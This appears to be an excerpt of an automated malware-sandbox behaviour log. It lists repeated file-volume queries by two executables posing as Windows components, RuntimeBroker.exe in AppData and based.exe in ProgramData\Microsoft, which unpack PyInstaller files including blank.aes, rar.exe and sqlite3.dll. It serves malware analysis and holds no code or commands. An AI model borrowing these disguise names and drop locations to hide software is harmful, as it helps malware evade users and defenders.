                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642 VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642 VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642 VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642 VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\Build.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI68642\base_library.zip VolumeInformationJump to behavior
                                  Source: C:\Users\user\AppData\Roaming\RuntimeBroker.exeQueries volume information: C:\Users\user\AppData\Roaming\RuntimeBroker.exe VolumeInformationJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\_ctypes.pyd VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\blank.aes VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\libcrypto-1_1.dll VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\libffi-7.dll VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\libssl-1_1.dll VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\python310.dll VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\rar.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\sqlite3.dll VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\VCRUNTIME140.dll VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\blank.aes VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\blank.aes VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\blank.aes VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\blank.aes VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\blank.aes VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\blank.aes VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\blank.aes VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\_lzma.pyd VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\_bz2.pyd VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\ProgramData\Microsoft\based.exe VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042 VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\_sqlite3.pyd VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
                                  Source: C:\ProgramData\Microsoft\based.exeQueries volume information: C:\Users\user\AppData\Local\Temp\_MEI77042\base_library.zip VolumeInformation
